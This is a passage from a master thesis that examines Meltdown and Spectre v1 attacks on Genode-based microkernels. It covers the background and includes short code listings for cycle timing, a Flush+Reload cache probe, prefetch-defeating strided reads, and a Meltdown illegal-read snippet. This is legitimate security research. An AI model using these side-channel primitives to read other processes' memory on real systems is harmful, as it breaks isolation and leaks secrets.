
Linköpings universitet SE–581 83 Linköping

Linköping University | Department of Computer and Information Science

Master thesis, 30 ECTS | Datateknik

2019 | LIU-IDA/LITH-EX-A--19/045--SE

Examining the Impact of Microarchitectural Attacks on Microkernels

a study of Meltdown and Spectre

Gunnar Grimsdal

Patrik Lundgren

Supervisor: Felipe Boeira
Examiner: Mikael Asplund


Upphovsrätt (Copyright)

This document is made available on the Internet - or its future replacement - for a period of 25 years from the date of publication, provided that no exceptional circumstances arise.

Access to the document implies permission for anyone to read, download, and print single copies for personal use, and to use it unchanged for non-commercial research and for teaching. Transfer of the copyright at a later date cannot revoke this permission. All other use of the document requires the consent of the copyright owner. To guarantee authenticity, security and accessibility, technical and administrative measures are in place.

The author's moral rights include the right to be mentioned as the author, to the extent required by good practice, when the document is used as described above, as well as protection against the document being altered or presented in a form or context that is offensive to the author's literary or artistic reputation or individuality.

For additional information about Linköping University Electronic Press, see the publisher's website: http://www.ep.liu.se/.

Copyright

The publishers will keep this document online on the Internet - or its possible replacement - for a period of 25 years starting from the date of publication barring exceptional circumstances.

The online availability of the document implies permanent permission for anyone to read, to download, or to print out single copies for his/hers own use and to use it unchanged for non-commercial research and educational purpose. Subsequent transfers of copyright cannot revoke this permission. All other uses of the document are conditional upon the consent of the copyright owner. The publisher has taken technical and administrative measures to assure authenticity, security and accessibility.

According to intellectual property law the author has the right to be mentioned when his/her work is accessed as described above and to be protected against infringement.

For additional information about the Linköping University Electronic Press and its procedures for publication and for assurance of document integrity, please refer to its www home page: http://www.ep.liu.se/.


Abstract

Most of today’s widely used operating systems are based on a monolithic design and have a very large code size which complicates verification of security-critical applications. One approach to solving this problem is to use a microkernel, i.e., a small kernel which only implements the bare necessities. A system using a microkernel can be constructed using the operating-system framework Genode, which provides security features and a strict process hierarchy. However, these systems may still be vulnerable to microarchitectural attacks, which can bypass an operating system’s security features, exploiting vulnerable hardware.

This thesis aims to investigate whether microkernels are vulnerable to the microarchitectural attacks Meltdown and Spectre version 1 in the context of Genode. Furthermore, the thesis analyzes the execution cost of mitigating Spectre version 1 in Genode's remote procedure calls.

The results show that Genode does not mitigate the Meltdown attack, which we confirm by demonstrating a working Meltdown attack on Genode+Linux. We also determine that microkernels are vulnerable to Spectre by demonstrating a working attack against two microkernels. However, we show that the cost of mitigating this Spectre attack is small, with a slowdown of approximately 3% for remote procedure calls in Genode.


Acknowledgments

We would like to thank all the people at Sectra Communications AB for their warm welcome and assistance with our thesis. We would like to give special thanks to our supervisor Christian Vestlund for his engagement and supporting knowledge on side-channel attacks. Additionally, we would like to thank Jonathan Jogenfors for his useful insights on writing a thesis.

From Linköping University, we would like to thank our examiner Mikael Asplund for his enthusiasm and academic input and Felipe Boeira for his feedback and support in writing our thesis.


Contents

Abstract iii

Acknowledgments iv

Contents v

List of Figures viii

List of Tables x

1 Introduction 2

1.1 Microkernel . . . 2

1.2 Genode . . . 3

1.3 Meltdown and Spectre . . . 3

1.4 Motivation . . . 4

1.5 Aim . . . 4

1.6 Research Questions . . . 4

1.7 Delimitations . . . 5

1.8 Thesis Outline . . . 5

2 Background 6

2.1 CPU Optimizations . . . 6

2.1.1 Cache . . . 6

2.1.2 Data Prefetching . . . 7

2.1.3 Out-of-Order Execution . . . 7

2.1.4 Speculative Execution . . . 7

2.1.5 Intel TSX . . . 7

2.2 Timing Channels . . . 7

2.2.1 Cache-Based Timing Channels . . . 8

2.2.2 Accurately Measuring Time . . . 8

2.3 Flush+Reload . . . 9

2.3.1 Shared Memory . . . 9

2.3.2 Preventing Data Prefetching . . . 10

2.4 Meltdown . . . 10

2.4.1 Virtual Address Space . . . 10

2.4.2 Meltdown Attack Description . . . 11

2.4.3 Proof-Of-Concept Implementation . . . 11

2.4.4 Mitigations . . . 12

2.4.5 Meltdown on Genode . . . 12

2.5 Spectre . . . 12

2.5.1 Spectre V1 Attack Description . . . 13

2.5.2 Spectre V1 Mitigations . . . 13


2.5.2.2 Index Bitmasking . . . 14

2.6 Performance . . . 15

2.6.1 Microkernel Performance . . . 15

2.6.2 IPC Performance . . . 15

2.7 Related Work . . . 15

2.7.1 Genode . . . 16

2.7.2 Side Channels . . . 16

2.7.3 Microarchitectural Attacks . . . 16

2.7.4 Linux Control Groups . . . 17

2.7.5 Security by Virtualization . . . 17

3 Method 18

3.1 Setting up System Under Test . . . 18

3.1.1 Using x86 Intrinsics . . . 18

3.1.2 Obtaining Output . . . 19

3.1.3 Building and Running on Nova . . . 20

3.1.4 Building and Running on Okl4 . . . 20

3.1.5 Building and Running on Linux . . . 21

3.1.6 Measuring Throughput . . . 21

3.2 Implementing the Flush+Reload Channel . . . 22

3.2.1 Measuring Cache Hits . . . 22

3.2.2 Preventing Data Prefetching . . . 23

3.2.3 Adapting the Channel to Targeted Kernels . . . 24

3.2.4 Measuring Throughput of the Covert Channel . . . 25

3.2.5 Reducing Noise . . . 25

3.3 Implementing Meltdown . . . 26

3.3.1 Recovering from Segmentation Fault . . . 26

3.3.2 Disabling Mitigations . . . 26

3.3.3 Choosing a Target Address . . . 26

3.4 Implementing Spectre . . . 27

3.4.1 Ensuring Speculative Execution . . . 28

3.4.2 Configure Variables for Spectre . . . 28

3.4.3 Measuring Throughput . . . 29

3.4.4 Measuring Impact of Mitigations . . . 29

4 Results 30

4.1 Flush+Reload . . . 30

4.1.1 Choosing Cache-Hit Thresholds . . . 30

4.1.2 Preventing Data Prefetching . . . 31

4.1.3 Measuring Throughput . . . 33

4.1.4 Reducing Noise . . . 33

4.2 Meltdown . . . 37

4.2.1 Reading a Victim’s Secret . . . 37

4.2.2 Reading the Linux Version Banner . . . 37

4.3 Spectre . . . 37

4.3.1 Training the Branch Predictor . . . 37

4.3.2 Ensuring Speculative Execution . . . 39

4.3.3 Attack Throughput . . . 39

4.3.4 Mitigations . . . 39


5.1.1 Cache-Hit Measurements . . . 43

5.1.2 Choosing Cache-Hit Thresholds . . . 44

5.1.3 Preventing Data Prefetching . . . 44

5.1.4 Inaccuracies in Throughput Measurements . . . 44

5.1.5 Reducing Noise . . . 45

5.2 Meltdown . . . 45

5.2.1 Alternative Segmentation Fault Recovery . . . 45

5.2.2 Turning off Mitigations . . . 45

5.2.3 The Difficulties of Reading Secrets . . . 45

5.2.4 Reliability Issues with Meltdown . . . 46

5.3 Spectre . . . 46

5.3.1 Training the Branch Predictor . . . 46

5.3.2 Criticism of Heuristic Cache Flush . . . 46

5.3.3 Throughput Anomalies . . . 46

5.3.4 Small Impact on Performance . . . 47

5.4 Source criticism . . . 47

5.5 The Work in a Wider Context . . . 48

5.5.1 Can OS Memory Separation be Trusted? . . . 48

5.5.2 Can Hardware Separation be Trusted? . . . 48

5.5.3 Consequences for Security and Safety Critical Systems . . . 48

5.5.4 Impact of This Work . . . 49

6 Conclusion 50

6.1 Future Work . . . 51


List of Figures

2.1 A model of virtual memory composition. . . 11

3.1 Overview of Genode’s Hierarchy . . . 19

3.2 The communication setup to retrieve output from the tested system. . . 19

3.3 A receiver observing access times for a cache hit on a Flush+Reload channel, built on a contiguous padded array. . . 22

3.4 A model of memory access times for different memory levels. . . 23

3.5 A sequence diagram for measurements of the LLC access times. . . 23

3.6 Leak Array Layout . . . 24

3.7 A sequence diagram of Flush+Reload communication between two processes. . . . 25

3.8 A sequence diagram of Meltdown using Intel TSX and Flush+Reload. . . 26

3.9 A sequence diagram of Spectre using Flush+Reload. . . 27

4.1 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Okl4. . . 31

4.2 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Nova. . . 31

4.3 Time measurements for accessing L1 cached, LLC cached and uncached values on Genode+Linux. . . 32

4.4 Time to access values in a pseudo-randomized or sequential pattern using 256 bytes as internal padding on Okl4. . . 32

4.5 Time to access values in a pseudo-randomized or sequential pattern using 4096 bytes as internal padding on Okl4. . . 33

4.6 Throughput from reading 2048 bytes from another process in Genode using Meltdown on Genode+Linux. . . 37

4.7 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Okl4. . . 38

4.8 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Nova. . . 38

4.9 Throughput of the Spectre attack for different choices of Ta and Na when reading a total of 2048 bytes on Genode+Linux. . . 38

4.10 Throughput for Spectre V1 using different choices of Hs for heuristically flushing the cache. . . 39

4.11 Measurements of execution time of RPC on Genode+Okl4 using Spectre V1 mitigations. . . 40

4.12 Measurements of execution time of RPC on Genode+Nova using Spectre V1 mitigations. . . 40

4.13 Measurements of execution time of RPC on Genode+Linux using Spectre V1 mitigations. . . 41

4.14 Percentage of correctly read bytes from reading 2048 bytes and compiling the

4.15 Percentage of correctly read bytes from reading 2048 bytes from running the same binary multiple times on Linux. . . 42


List of Tables

4.1 The Cache-hit thresholds in CPU cycles for each kernel. . . 31

4.2 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Okl4 for different internal padding sizes. . . 31

4.3 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Nova for different internal padding sizes. . . 32

4.4 Number of cache hits from iteration over uncached array using an SRG 256 times on Genode+Linux for different internal padding sizes. . . 32

4.5 Reading 2048 bytes with Flush+Reload within one process. . . 33

4.6 Reading 2048 bytes with Flush+Reload between two processes. . . 34

4.7 Reading 2048 bytes using Flush+Reload within a process on Genode+Okl4 with different number of attempts. . . 34

4.8 Reading 2048 bytes using Flush+Reload within a process on Genode+Nova with different number of attempts. . . 34

4.9 Reading 2048 bytes using Flush+Reload within a process on Genode+Linux with different number of attempts. . . 35

4.10 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Okl4 with different number of attempts. . . 35

4.11 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Nova with different number of attempts. . . 35

4.12 Reading 2048 bytes between two processes, using Flush+Reload on Genode+Linux with different number of attempts. . . 36

4.13 Result of reading 2048 bytes with Spectre V1 with chosen parameters. . . 39

4.14 Mean relative slowdown and standard deviation after applied lfence mitigation. . . 41

4.15 Mean relative slowdown and standard deviation after applied bitmask mitigation. . . 41


1

Introduction

Most of today's widely used Operating Systems (OSs) like Windows, GNU/Linux and OSX1 are based on a monolithic design, meaning that all parts of the operating system act as a trusted part of the kernel. In such a design, drivers, the file system and Inter-Process Communication (IPC) are all handled as part of the kernel and trusted as such. Consequently, a flaw in any of these trusted components may compromise the entire kernel. Moreover, OSs based on a monolithic design, like Windows and GNU/Linux, are difficult to verify due to their size. The Linux kernel contains millions of lines of source code and is frequently updated [6]. While there have been efforts to formally verify the correctness of software against a specification, this has only been done on a much smaller scale. The Sel4 kernel, with its 9300 lines of code [23], has been formally verified against its specification at a cost of roughly 20 lines of verification code per line of source code and 22 person-years of work2. Microsoft researchers Hawblitzel et al. have in the Ironclad project [16], instead of focusing on application verification, used automated tools to verify security-critical libraries. The Ironclad project achieved a less costly verification, at 4.8 lines of verification code per line of source code and 3 person-years of work. However, the fact remains that formal verification is very costly; even at a roughly five-fold increase in development cost, OSs containing millions of lines of code are far out of reach with today's tools.

1.1

Microkernel

One approach to mitigating this size issue is to replace the monolithic kernel with a microkernel. A microkernel is a small kernel, typically containing only around 10,000 lines of code3. This small size stems from one of the leading design goals of a microkernel, which is to run most services in user space and to provide only essential functionality in kernel space. This type of design reduces the amount of privileged code and may reduce the risk that kernel-level services are compromised. It also allows unneeded services to be disabled, which is important as it may reduce the attack surface of the kernel.

1Operating System Market Share Worldwide. en. May 2019. URL: http://gs.statcounter.com/os-market-share (visited on 2019-05-06).


1.2

Genode

The small amount of code in microkernels may result in a lack of some useful functionality such as protocol stacks and network drivers. Genode is a framework for building secure OSs using a microkernel, and it tries to address this issue of missing OS components [7]. Genode provides more than 100 ready-to-use components such as network drivers and protocol stacks. In Genode, as many components as possible are executed in user space. One key feature of Genode is that each component is assigned a budget by its parent process for resources such as CPU time, memory and file-system access. Genode has been developed to run on multiple kernels, for example, Nova, Okl4 and Linux. The Nova kernel, which is a microhypervisor, is a research project aimed at secure virtualization. Similar to a microkernel, it provides essential functionality for virtualization like communication, scheduling and resource management4. Okl4 is an open-source microkernel based on the L4 microkernel. It can be used as a hypervisor or as a real-time OS and has been used in practice by General Dynamics5.

Genode tries to achieve a secure OS design by carefully isolating components using hardware and software separation [7]. Microarchitectural attacks have in some ways compromised software and hardware separation. These attacks exploit the microarchitectural state of the CPU, e.g., caches or Translation Lookaside Buffer (TLB). Such attacks may break software which is dependent on a correct hardware implementation. This class of attacks has had recent success in the form of Meltdown and Spectre [31, 24].

1.3

Meltdown and Spectre

Meltdown is a microarchitectural attack which exploits the fact that some modern CPUs may execute instructions out of order [31]. Specifically, Meltdown can read memory from an addressable memory space which it should not be able to read from. Lipp et al. [31] used a Meltdown exploit to read memory from the kernel and other user processes in Linux. This was possible as the Linux kernel’s memory was mapped into the address space of each user process. Genode’s founder Feske has stated that some in-kernel data structures in Genode are likely vulnerable to the Meltdown attack6.

Spectre relies on the fact that some modern CPUs may speculatively execute instructions [24]. There are different versions of the Spectre attack [42, 24, 33]; we will be looking at Spectre version 1, which exploits speculative execution to bypass boundary checks. An attacker could use this attack to execute code which bypasses a boundary check and leaks information to the attacker.

Both Meltdown and Spectre rely on an attacker being able to transmit gathered data to and from the cache. Flush+Reload is a Side-Channel Attack (SCA) which abuses the time difference of fetching uncached and cached data [48]. This channel can be used in the context of Meltdown and Spectre to first read kernel memory into a cache exploiting their respective CPU optimizations. If the address which is cached is carefully crafted, the time with which a process can access this address can be measured to retrieve information.

SCAs extract information from another system or user by abusing some aspect of the system which is not supposed to transmit information. A side channel can also be used as a covert channel, i.e., a channel over which two colluding actors deliberately communicate.

4NOVA Microhypervisor. URL: http://hypervisor.org/ (visited on 2019-03-19).

5General Dynamics. Hypervisor Products - General Dynamics Mission Systems. en. 2018. URL: https://gdmissionsystems.com/en/products/secure-mobile/hypervisor (visited on 2019-03-22).

6N. Feske. Side-channel attacks (Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/mailman/message/36178974/ (visited on 2019-01-16).


1.4

Motivation

Software separation may work as mitigation against some microarchitectural attacks. Lipp et al. described how the Kernel Address Isolation to have Side Channels Efficiently Removed (KAISER) patch mitigates Meltdown [31]. KAISER removes the kernel map from user space and therefore removes Meltdown’s ability to access kernel memory7. However, the methods used to mitigate Meltdown significantly impact performance [36].

There have been efforts to mitigate the Spectre attack. However, mitigations against Spectre attacks focus on treating the symptoms of the attack rather than preventing it. This is because disabling speculative execution is usually not supported and any CPU performing speculative execution may leak data [33]. Thus, the options are either to mitigate the attacks in software or the very expensive one of replacing speculating CPUs with non-speculating ones.

The Genode OS framework is interesting from a security standpoint for its strict process separation, its adherence to a minimal kernel and its open-source code. However, it has been suggested by Feske that some information can leak from Genode through the Meltdown attack8. A successful attack may compromise the very security guarantees that are the reason for choosing Genode. Furthermore, Feske states that there have been no efforts to mitigate Spectre attacks. Schmidt et al. [39] demonstrated ways to circumvent security policies for Genode's IPC by implementing a covert channel which abused a file-system cache in Genode. This covert channel could transfer data at a rate of 2 bit/s between two user-owned processes. To the best of our knowledge, there has been no previous work demonstrating a violation of Genode's memory separation.

1.5

Aim

This thesis aims to study the impact of microarchitectural attacks on microkernels. In particular, we aim to demonstrate the effectiveness of Meltdown and Spectre on microkernels as well as to measure the performance impact after Spectre version 1 mitigations have been applied.

1.6

Research Questions

1. Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of the demonstrated channel?

We answer this research question by demonstrating a working Flush+Reload channel between two processes in Genode. We define throughput as the number of successfully transmitted bytes per second.

2. Are Remote Procedure Call (RPC) mechanisms in the microkernels Nova and Okl4 vulnerable to the Spectre Version 1 (Spectre V1) attack, measured as the throughput of the demonstrated attack?

We answer this research question by demonstrating a Spectre attack exploiting a victim using bounds-checked array access. The target implements a vulnerable RPC which is one of Genode’s mechanisms for IPC.

3. Can the Meltdown attack be executed on Genode?

We answer this research question by demonstrating that Meltdown can be used to read data from another process.


4. What is the performance impact of alternative Spectre V1 mitigations, measured as the relative slowdown of RPC mechanisms?

To answer this research question, we apply different mitigations and measure their respective performance impacts for each targeted kernel.

We reproduce Spectre on Genode+Okl4 and Genode+Nova with a throughput of 2 kB/s using Flush+Reload. Furthermore, we demonstrate Meltdown on Genode+Linux by reading memory from a victim process, transmitting up to 9 kB/s. In addition, we show that the performance impact of two different Spectre V1 mitigations on Genode’s RPCs is negligible. Consequently, we demonstrate that these microkernels are not secure by design and that Genode does not provide protection against microarchitectural attacks.

1.7

Delimitations

The scope of this thesis is limited to attacking Genode on chosen hardware (Intel Core i5-7500 CPU). There will not be any efforts to compare results on different types of hardware, nor will there be efforts to evaluate kernels which are not supported by Genode.

1.8

Thesis Outline

This thesis begins by introducing the fundamentals of CPU optimizations as well as more detailed information on the workings of microarchitectural attacks and performance measurements in Chapter 2. The method used to obtain results is presented in Chapter 3 and the results in Chapter 4. The work in a wider context is discussed in Chapter 5, and answers to the research questions are presented in Chapter 6.


2

Background

To understand the workings and implications of Meltdown and Spectre, there is a need for a fundamental understanding of CPU optimizations. Thus, this chapter begins by describing the main optimizations which are utilized in the attacks. Furthermore, an understanding of timing channels is needed to understand the tools with which microarchitectural attacks leak information. For this reason, this chapter continues by describing timing channels before moving on to the Meltdown and Spectre attacks.

2.1

CPU Optimizations

Modern CPUs use many kinds of optimizations to reduce execution time, some of which need to be taken into account by a developer, while others seamlessly optimize executing code. Some of these optimizations have noticeable effects on code execution, often in the form of reduced execution time. For this reason, these optimizations are relevant to the use of timing channels.

2.1.1

Cache

The time it takes to access data from DRAM is a bottleneck in modern computers; one memory access to DRAM can take approximately 240 CPU cycles on an Intel Pentium M processor [15]. Modern CPUs therefore also contain faster memory called cache. The cache is often divided into different levels, where the levels closer to the CPU core are faster but smaller than the caches on higher levels [15]. The number of cache levels varies depending on which CPU is used. The cache closest to the core is called the L1 cache, the next level is the L2 cache and so on [15]. The highest-level cache is called the Last-Level Cache (LLC) and is often the L2 or L3 cache in Intel CPUs; this cache is shared between multiple cores on multi-core CPUs [48]. The CPU used in this thesis has three cache levels, L1, L2 and LLC, which can be seen by running the command lscpu in a Linux terminal.

Memory accesses which resolve to a cache access are usually referred to as cache hits, whereas memory accesses which do not are referred to as cache misses.


2.1.2

Data Prefetching

Data prefetching is an optimization which speculatively loads data into cache before it is explicitly used. This is done to improve the performance of predictable access patterns, such as sequential access [19].

2.1.3

Out-of-Order Execution

Modern CPUs have an optimization which allows the CPU to execute instructions out of order [19]. Out-of-Order Execution (OOE) allows instructions to be executed simultaneously with or before preceding instructions; this is done to minimize the time the CPU is stalled [19]. Listing 2.1 shows an example in which OOE can reduce execution time. Line 1 fetches memory located at ptr, and line 2 cannot be executed while this fetch is in progress. The CPU can, therefore, execute the instruction on line 3 while waiting for the data to be fetched.

Listing 2.1: Example of Out-of-Order Execution

1 mov edx, [ptr] ; Copy data from memory located at ptr to edx

2 add edx, 1 ; Add 1 to edx

3 mov ebx, 1 ; Copy 1 to ebx, may execute before line 2

2.1.4

Speculative Execution

Speculative execution is a technique for reducing the execution time of programs by speculatively executing a branch which has yet to be determined valid [18]. If the branch is determined invalid, the results of the computations are reversed, returning the CPU to its state before the speculative execution [18]. However, speculative execution may alter the microarchitectural state of the processor, including the TLB and caches [18].

The Branch-Prediction Unit (BPU) makes different types of predictions for branches to enable faster execution. For conditional branches, the BPU predicts either a false or a true outcome depending on values stored in the Branch-Target Buffer (BTB) [19].

2.1.5

Intel TSX

Some Intel processors support the so-called Intel Transactional Synchronization Extension (TSX). This extension allows for transactional execution of code under some restrictions [20]. At its core, Intel TSX allows for executing some instructions as a transaction, either committing the result of these instructions or aborting, subsequently reverting changes to the CPU’s state from the computations. Similarly to speculative execution, Intel TSX does not revert microarchitectural state [20] and may thus leave information in the cache from an aborted transaction.

2.2

Timing Channels

Lampson wrote a paper defining covert channels in 1973; his definition was:

”Covert channels, i.e. those not intended for information transfer at all, such as the service program’s effect on the system load.” [27, p. 4]

Hence, a covert channel is a communication channel which abuses a resource or a component which is not intended for communication.

Side channels are unintended communication channels which depend on the physical implementation of a system rather than a theoretical weakness of it [11]. We distinguish side channels from covert channels in that a covert channel is between two or more cooperating agents, while a side channel is one received by an attacker to spy on a victim.


Timing channels are a subset of SCAs in which an attacker examines the time it takes to perform a certain task. Brumley and Boneh [2] executed a timing attack against a server running Apache with OpenSSL. They could extract the RSA key from the server by executing malformed SSL handshakes multiple times, measuring the server's response time to retrieve information about the computations.

2.2.1

Cache-Based Timing Channels

One category of these timing-channel attacks is cache-based channels; these attacks exploit the fact that the access time for a memory address varies depending on whether the value is stored in the cache or not [8]. Cache-based channels include Prime+Probe, Flush+Reload and Evict+Time [8, 48].

2.2.2

Accurately Measuring Time

A reliable way to measure the time it takes to access a value is a necessity for implementing a cache-based timing channel. Paoloni [34] has published guidelines for benchmarking code execution on Intel 32- and 64-bit architectures. Paoloni describes the use of the Time-Stamp Counter (TSC), which counts CPU cycles, for measuring time. Intel 32- and 64-bit architectures come with two instructions for reading the TSC: rdtsc and rdtscp. Paoloni recommends measurement using the timer in Listing 2.2, which uses the instructions rdtsc, rdtscp and cpuid to prevent OOE. Yarom and Falkner noted that use of the cpuid instruction may not be desirable for cross Virtual Machine (VM) channels, as the instruction may be emulated by the Virtual Machine Monitor (VMM) [48]. In place of the cpuid instruction they instead use a load fence, which stalls the CPU until all previous loads have resolved. The rdtsc instruction reads the TSC into the CPU registers edx and eax. Similarly, rdtscp reads the TSC into these registers but additionally waits for previous instructions to have executed [34].

Paoloni also suggests an alternative method, presented in Listing 2.3, for when the rdtscp instruction is not available.

Listing 2.2: Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions

2 rdtsc ; Read TSC into edx, eax

3 mov var1, edx ; Store TSC in var1 and var2

4 mov var2, eax;

5 ; Call measured function here

6 rdtscp ; Serialize previous instructions and read TSC

7 mov var3, edx ; Store second TSC into var3 and var4

8 mov var4, eax ;


Listing 2.3: Alternative Timer Recommended by Intel

1 cpuid ; Prevent OOE for previous instructions

2 rdtsc ; Read TSC into edx, eax

3 mov var1, edx ; Store TSC in var1 and var2

4 mov var2, eax;

5 ; Call measured function here

6 cpuid ; Serialize previous instructions

7 rdtsc ; Read TSC

8 mov var3, edx ; Store second TSC into var3 and var4

9 mov var4, eax ;

10 cpuid ; Prevent OOE for following instructions
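For readers who prefer C over assembly, the same measurement can be expressed with compiler intrinsics, which is also how these instructions are accessed later in this thesis (Section 3.1.1). The following is a minimal sketch assuming GCC or Clang on x86-64; the names measure_cycles and measured_function are illustrative and not taken from the thesis.

#include <stdint.h>
#include <x86intrin.h>   /* __rdtsc, __rdtscp */
#include <cpuid.h>       /* __cpuid */

/* Measure the execution time of one call to a function, in CPU cycles.
 * cpuid acts as a serializing barrier so that earlier instructions cannot
 * be reordered past the first rdtsc, and rdtscp waits for the measured
 * code to finish before the TSC is read again. */
static uint64_t measure_cycles(void (*measured_function)(void))
{
    unsigned int eax, ebx, ecx, edx, aux;

    __cpuid(0, eax, ebx, ecx, edx);   /* serialize preceding instructions */
    uint64_t start = __rdtsc();       /* first time stamp */

    measured_function();              /* code under measurement */

    uint64_t end = __rdtscp(&aux);    /* serializing read of the TSC */
    __cpuid(0, eax, ebx, ecx, edx);   /* keep later instructions out of the window */

    return end - start;
}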

2.3

Flush+Reload

Flush+Reload is a cache-based timing channel designed by Yarom and Falkner [48] which exploits timing of the LLC. Therefore, Flush+Reload does not require that the attacker and victim run their respective processes on the same CPU core. Flush+Reload relies on sharing pages with a victim process, as this allows Flush+Reload to control the caching of these shared pages [48].

The attack Yarom and Falkner developed works by evicting a specific memory line using clflush and subsequently letting the victim execute. After the victim has executed, the attacker can check whether the evicted line is once again in the cache. Checking whether the value is in the cache is done by defining a machine-specific time threshold below which accesses are considered cache hits. Yarom and Falkner profiled cache misses using clflush to define the threshold. Zhou et al. [50] presented a method to choose the threshold for Flush+Reload and concluded that the threshold should be below, but close to, the lower boundary of DRAM access times.

Yarom and Falkner note that some CPU optimizations, e.g., speculative execution or data prefetching, may result in false positives. Consequently, it is desirable to have strategies to filter out these false positives; however, Yarom and Falkner do not suggest any such methods.
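As a concrete illustration of the flush and reload phases described above, the following C sketch flushes a shared address and later times a reload to decide whether the victim touched it. It assumes an x86 CPU with the clflush and rdtscp instructions; the threshold value is only a placeholder and must be profiled per machine, as discussed above.

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_lfence, __rdtscp */

#define CACHE_HIT_THRESHOLD 100   /* illustrative value; must be profiled per machine */

/* Flush one shared cache line so that a later access by the victim is observable. */
static void flush(volatile void *addr)
{
    _mm_clflush((const void *)addr);
}

/* Reload the line and report whether the access time indicates a cache hit,
 * i.e. whether the line was brought back into the cache since it was flushed. */
static int probe(volatile uint8_t *addr)
{
    unsigned int aux;
    uint64_t start, end;

    _mm_lfence();                 /* wait for earlier loads to complete */
    start = __rdtscp(&aux);
    (void)*addr;                  /* the timed reload */
    end = __rdtscp(&aux);

    return (end - start) < CACHE_HIT_THRESHOLD;
}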

2.3.1

Shared Memory

One requirement for Flush+Reload is the availability of shared memory between the attacker and the victim. Multiple processes can have access to a shared physical memory space in modern OSs1. One reason for using shared memory is to optimize memory usage when multiple processes are using the same library [31]. The OS may load a library once into physical memory and reference that memory with different virtual memory addresses. Hence, instead of every process loading the library into its own user space, the library is only loaded once and thereafter shared by multiple processes. User processes can also use shared memory for IPC in some OSs [31].

This mechanism for optimizing the use of shared libraries has been used by Yarom and Falkner [48] to extract encryption keys via a Flush+Reload side channel.

Genode has a strict separation between its processes and should, therefore, not optimize memory usage by sharing memory [7]. However, a Flush+Reload channel may still be used between two processes sharing memory for IPC2.

1M. T. Jones. Anatomy of Linux dynamic libraries. 2008. URL: https://www.ibm.com/developerworks/linux/library/l-dynamic-libraries/ (visited on 2019-01-17).

2N. Feske. Side-channel attacks (Meltdown, Spectre). 2018. URL: https://sourceforge.net/p/genode/mailman/message/36178974/ (visited on 2019-01-16).


2.3.2

Preventing Data Prefetching

Several techniques have been shown to be effective at preventing data prefetching. Reads in randomized order or via a random-order linked list are techniques suggested by Liu et al. [32] to prevent data prefetching. Kocher et al. [24], although not stating it explicitly, utilize a form of strided reads in their POC, thus preventing data prefetching. We will denote the form of strided reads used by Kocher et al. as Strided Read Generators (SRGs), which can be constructed as

x_si = (a * i + b) mod m

where

a ≡ 1 (mod p)

for all prime factors p of m. For example, choosing a = 127, b = 0 and m = 256 gives the sequence x_si ∈ {0, 127, 1, 128} from the sequence i ∈ {0, 1, 2, 3}.
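To make the construction concrete, the sketch below generates such a strided visiting order and uses it to touch a probe array. It assumes a is chosen coprime to m, so that every index is visited exactly once (which holds for the example values above); the names srg_order and probe_all are illustrative, not taken from the thesis.

#include <stddef.h>

/* Generate a strided (mixed) visiting order x_si = (a*i + b) mod m, used so
 * that the hardware prefetcher does not see a simple sequential pattern. */
static void srg_order(size_t *order, size_t m, size_t a, size_t b)
{
    for (size_t i = 0; i < m; i++)
        order[i] = (a * i + b) % m;
}

/* Example: visit a probe array of 256 cache lines in SRG order,
 * with a = 127, b = 0 and m = 256 as in the example above. */
static void probe_all(volatile unsigned char *probe_array, size_t line_size)
{
    size_t order[256];
    srg_order(order, 256, 127, 0);

    for (size_t i = 0; i < 256; i++)
        (void)probe_array[order[i] * line_size];
}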

2.4

Meltdown

Meltdown is a microarchitectural attack leveraging OOE in some modern processors to leak memory via a cache covert channel. OOE is used to modify the contents of the cache; subsequently, the altered cache is read via a covert channel [31].

Lipp et al. [31] describe two practical Meltdown attacks. The first attack showed how an attacker could read stored passwords from Firefox running on the same machine [31]. The second attack demonstrated how an attacker could exploit a system to dump the memory of another process, even with Kernel Address Space Layout Randomization (KASLR) active [31]. KASLR is a mechanism which randomizes the kernel-space memory layout at boot time [9].

2.4.1

Virtual Address Space

The process executing the Meltdown attack is required to have a virtual memory address corresponding to the physical memory address where the targeted data is located. Virtual memory is designed to isolate processes from each other. Virtual memory also acts as an abstraction from hardware and physical memory, exposing a conceptually infinite space of memory [15, p.38].

Hat [15] explains how the virtual address is split, one part indexing a page directory entry, the other indexing an offset within that page. Multiple page directory entries may resolve to the same physical memory page. Shared memory is commonly implemented in this way, i.e. mapping multiple virtual addresses to the same physical memory address [15, p.38].

Figure 2.1 shows the virtual memory map of a process running on 64-bit Linux. The process's memory space, i.e. user space, is located at the lower address range and the kernel at the highest address range. In between user and kernel space is unused address space. The layout of the kernel space is the same for all user processes in Linux. This is done to remove the need to reconfigure the Memory-Management Unit (MMU) when switching to kernel mode, which is a costly operation3.

Figure 2.1: A model of virtual memory composition: user space starts at 0x0000000000000000, unused space at 0x0000008000000000, and kernel space spans 0xFFFFFF8000000000 to 0xFFFFFFFFFFFFFFFF.

2.4.2

Meltdown Attack Description

An attacker can read some data and use this data to index into an array. The attacker can then use a covert cache channel to inspect which index in the array was accessed and thereby learn what the initial data was.

The Meltdown attack is performed in this way, indexing an array with the value from an illegal memory access. On most kernels this raises a segmentation fault, preventing the address from being read and triggering signal handling. However, if the CPU uses OOE, the array may be indexed with the data before the signal handling occurs [31]. Listing 2.4 shows an example of how the Meltdown attack may work. Here the data at the address 0x7ffffdf9d580 is saved to a variable with which the array data is indexed. If OOE is available, the access of data may occur before the signal handling and leave the data in the cache.

For Meltdown to read a memory address, that address needs to be mapped into the address space of the user process, i.e., the user process needs to have access to virtual memory corresponding to the physical memory of the process under attack [31].

Listing 2.4: Meltdown Memory Access

1 // Illegal memory read

2 char ill = * (char*) 0x7ffffdf9d580;

3 // PAGE_SIZE offset is to prevent the prefetcher from

4 // fetching adjacent data, i.e. so that

5 // the exact value of ill can be identified with Flush+Reload

6 data[ill * PAGE_SIZE] = 0;

2.4.3

Proof-Of-Concept Implementation

